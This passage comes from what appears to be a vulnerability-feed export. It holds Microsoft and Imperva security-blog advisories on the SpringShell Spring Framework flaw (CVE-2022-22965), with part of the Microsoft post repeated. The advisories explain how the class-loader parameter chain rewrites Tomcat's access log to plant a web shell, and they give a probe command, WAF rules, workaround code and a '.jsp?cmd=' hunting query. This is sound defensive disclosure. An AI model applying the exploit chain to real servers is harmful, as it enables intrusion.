post Figure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client's ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed for that manipulation of the access log to be placed in an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path inside the Tomcat's web application ROOT directory, which essentially drops a reverse shell inside Tomcat. For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application's developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public string handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. So, if, for instance, _Location_ will be defined as:\n \n \n class Location \n { \n public void setCountry(string country) {\u2026} \n public void setCity(string city) {\u2026} \n public string getCountry() {\u2026} \n public string getCity() {\u2026} \n }\n\nIf we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nThe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try and initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&coordinate.latitude=456_ Spring would try and set those values in the _coordinates_ member of _location_, before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try and bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If location has a getX_()_ accessor, call it to get the _x_ member of location\n 3. Use Java introspection to map all accessors and mutators in the_ x_ object\n 4. If the _x_ object has a _getY_() accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the_ y_ object\n 6. If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object's class.\n 2. _Class_ objects have a _getClassLoader()_ accessor the gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring mapped the _getClassLoader()_ accessor of the _Module_ object. Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve _is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory: **The path where to store the access log, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by http requests, such as the web application\u2019s directory.\n 2. **Prefix: **The prefix of the access log file name\n 3. **Suffix: **The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern: **A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server as Tomcat.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. \n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and include vulnerability protection for SpringShell since March 31, 2022. The screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to versions 5.3.18 or later or 5.2.19 or later. If the patch is applied, no other mitigation is necessary.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search the @InitBinder annotation globally in the application to see if the dataBinder.setDisallowedFields method is called in the method body. If the introduction of this code snippet is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** If this code snippet is used a lot, it needs to be appended in each location.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice{\n @InitBinder\n public void setAllowedFields(webdataBinder dataBinder){\n String[]abd=new string[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alerts for an observed attack, but might not be unique to exploitation for this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### Microsoft 365 Defender advanced hunting queries \n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers HTTP use of the exploitation and not HTTPS.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempt (CVE-2022-22965) to drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2202-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts _table includes only the device name of the affected device. This query joins the _DeviceInfo _table to clearly connect other information such as device group, IP address, signed in users, and others. This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 _Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See _Detection and Mitigation section for details_.\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now has enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See Detection and Mitigation section for details. \n[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mmpc", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MMPC:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2022-03-31T18:03:34", "description": "New zero-day Remote Code Execution (RCE) vulnerabilities were discovered in Spring Framework, an application development framework and inversion of control container for the Java platform. The vulnerability potentially leaves millions of applications at risk of compromise. In two separate disclosures, [zero-day](<https://www.imperva.com/learn/application-security/zero-day-exploit/>) RCE vulnerabilities were revealed in the Cloud and Core modules of Spring Framework.\n\nSpring Framework \u201cprovides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform\u201d [[1](<https://spring.io/projects/spring-framework>)]. Java is one of the most commonly used development languages, and Spring is commonly cited as one of the most popular Java frameworks.\n\nThe first of the disclosures [dropped](<https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html>) on March 26, and reported on a vulnerability in the Spring Framework Cloud module, which allowed for the injection of a SPeL expression into a header value. This crafted header value would then be evaluated by the server and could result in a RCE. The vulnerability was assigned [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>).\n\nThe second of these disclosures was released on March 29 on Twitter by a researcher, in a since-deleted Tweet, containing a screenshot of the exploit request. Since then, the exploit was tweeted by others and published to GitHub, but again, was quickly removed. The vulnerability, called Spring Framework RCE via Data Binding on JDK 9+, comes in the form of a Java class injection flaw in Spring Core, where the JDK version is >=9.0. If exploited, an attacker can leverage this vulnerability to perform a RCE on the server. This vulnerability was assigned [CVE-2022-22965](<https://tanzu.vmware.com/security/CVE-2022-22965>).\n\nSince the disclosures, Imperva Threat Research monitored widespread attempted exploitations of _both_ new zero-day vulnerabilities (~5.5 million and counting as of March 31).\n\n## Imperva Delivers Protection from CVE-2022-22963\n\nImperva Threat Research analysts downloaded and quickly tested the exploit, verifying that both vulnerabilities are blocked out of the box by [Imperva Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and Imperva WAF Gateway.\n\nGiven the nature of how [Imperva Runtime Protection (RASP)](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) works, RCEs caused by CVE-2022-22963 and Spring4Shell are stopped without requiring any code changes or policy updates. If Imperva RASP is currently deployed, applications of all kinds (active, legacy, third-party, APIs, etc.) are protected.\n\nTogether, Imperva WAF and Imperva RASP provide defense-in-depth for protecting applications and APIs. Both are industry-leading products that are designed to protect against zero day threats and the OWASP Top 10 application security threats, injections and weaknesses. If you\u2019re looking for protection from CVE-2022-22963, please contact us.\n\n**Q: How can I verify that Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) is being blocked?**\n\n**A:** For CWAF customers, Imperva provides attack analytics, which shows customers any attempts to exploit CVE-2022-22963. In addition, existing rules for older vulnerabilities including CVE-2015-1427 protect against CVE-2022-22965.\n\nFor WAF Gateway customers, Imperva has signatures for older vulnerabilities, including CVE-2010-1871, CVE-2018-1260, and CVE-2015-1427 that protect against CVE-2022-22963 and CVE-2022-22965\n\nImperva is also in the process of pushing more specific rules that will have a clear name associated with CVE-2022-22963 and CVE-2022-22965.\n\nThe post [Imperva Protects from New Spring Framework Zero-Day Vulnerabilities](<https://www.imperva.com/blog/imperva-protects-from-new-spring-framework-zero-day-vulnerabilities/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:20:03", "type": "impervablog", "title": "Imperva Protects from New Spring Framework Zero-Day Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2015-1427", "CVE-2018-1260", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T15:20:03", "id": "IMPERVABLOG:45FA8B88D226614CA46C4FD925A08C8B", "href": "https://www.imperva.com/blog/imperva-protects-from-new-spring-framework-zero-day-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2022-04-11T23:40:23", "description": "**_April 11, 2022 update_** \u2013 __Azure Web Application Firewall (WAF) customers with Regional WAF with Azure Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See [](<https://www.microsoft.com/security/blog/wp-admin/post.php?post=110715&action=edit#detectandprotect>)Detect and protect with Azure Web Application Firewall (Azure WAF) section for details__.\n\nOn March 31, 2022, vulnerabilities in the Spring Framework for Java were [publicly disclosed](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>). Microsoft is currently assessing the impact associated with these vulnerabilities. This blog is for customers looking for protection against exploitation and ways to detect vulnerable installations on their network of the critical remote code execution (RCE) vulnerability [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>) (also known as SpringShell or Spring4Shell).\n\nThe Spring Framework is the most widely used lightweight open-source framework for Java. In Java Development Kit (JDK) version 9.0 or later, a remote attacker can obtain an _AccessLogValve _object through the framework\u2019s parameter binding feature and use malicious field values to trigger the pipeline mechanism and write to a file in an arbitrary path, if certain conditions are met. \n\nThe vulnerability in Spring Core\u2014referred to in the security community as SpringShell or Spring4Shell\u2014can be exploited when an attacker sends a specially crafted query to a web server running the Spring Core framework. Other vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, any system within the scope of impacted systems listed above should still be considered vulnerable.\n\nThe [](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)[threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n * Background\n * Request mapping and request parameter binding\n * The process of property binding\n * The vulnerability and its exploitation\n * Prelude: CVE-2010-1622\n * The current exploit: CVE-2022-22965\n * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n * How to find vulnerable devices\n * Enhanced protection with Azure Firewall Premium\n * Detect and protect with Azure Web Application Firewall (Azure WAF)\n * Global WAF with Azure Front Door\n * Regional WAF with Azure Application Gateway\n * Patch information and workarounds\n 5. Detections\n * Microsoft 365 Defender\n * Endpoint detection and response (EDR)\n * Antivirus\n * Hunting\n * Microsoft 365 Defender advanced hunting queries \n * Microsoft Sentinel\n\n## Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC is specific to Tomcat server's logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ class using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then change the default access logs to a file of their choosing.\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessValveLog_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes a Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\n Figure 2. Screenshot from the original POC code post Figure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client's ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed for that manipulation of the access log to be placed in an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path inside the Tomcat's web application ROOT directory, which essentially drops a reverse shell inside Tomcat. For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application's developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public string handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. So, if, for instance, _Location_ will be defined as:\n \n \n class Location \n { \n public void setCountry(string country) {\u2026} \n public void setCity(string city) {\u2026} \n public string getCountry() {\u2026} \n public string getCity() {\u2026} \n }\n\nIf we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nThe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try and initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&coordinate.latitude=456_ Spring would try and set those values in the _coordinates_ member of _location_, before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try and bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If location has a getX_()_ accessor, call it to get the _x_ member of location\n 3. Use Java introspection to map all accessors and mutators in the_ x_ object\n 4. If the _x_ object has a _getY_() accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the_ y_ object\n 6. If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object's class.\n 2. _Class_ objects have a _getClassLoader()_ accessor the gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring mapped the _getClassLoader()_ accessor of the _Module_ object. Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve _is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory: **The path where to store the access log, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by http requests, such as the web application\u2019s directory.\n 2. 